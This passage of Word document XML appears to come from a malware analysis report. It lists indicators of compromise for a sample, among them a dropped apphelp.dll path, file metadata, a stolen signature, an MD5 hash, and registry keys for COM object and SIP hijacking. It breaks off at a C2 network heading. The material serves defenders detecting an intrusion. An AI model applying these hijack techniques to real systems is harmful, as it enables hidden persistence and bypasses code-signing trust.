          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SubjectInterfacePackage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SIP) for Signature Verification Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A3275" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Disk Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE5DD1" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>C:\Users\Public\Libraries\apphelp.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1CDF3" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2906D7DE" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>File: C:\windows\system32\apphelp.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>InternalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Apphelp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>OriginalFilename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Apphelp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FileVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>: 10.0.10586.0(rs1_release.151029-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>1700)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>FileDescription:ApplicationCompatibility</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> Client Library</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Product: Microsoft® Windows® Operating System</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>ProductVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>: 10.0.10586.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Debug: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Patched: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>PreRelease</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>PrivateBuild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>SpecialBuild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Language: English (United States)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06942B68" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>: Stolen from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t xml:space="preserve">c: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>\windows\system32\taskhostw.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D51DA64" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Time Stamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>: 10/30/2015 02:17 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48343593" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>File Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>: 427960</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F81D00" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>MD5 Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>: A31B0124152CBB60C68DCFEBC9C4909C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D3F3F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Registry Modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F04135" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>COM Object Hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902689E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Key: HKCU:\Software\Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>3543}\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">InProcServer32'    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Property: (Default)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Property: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ThreadingModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C74517C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>SIP Hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566E4F4" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>Key: HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType0\CryptSIPDllVerifyIndirectData</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        </w:rPr>
        <w:t>\{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:color w:val="FFFFFF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>C689AAB8-8E78-11D0-8C47-00C04FC295EE}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A357C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Network Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092D5E0" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HTTP Traffic C2 commands through </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
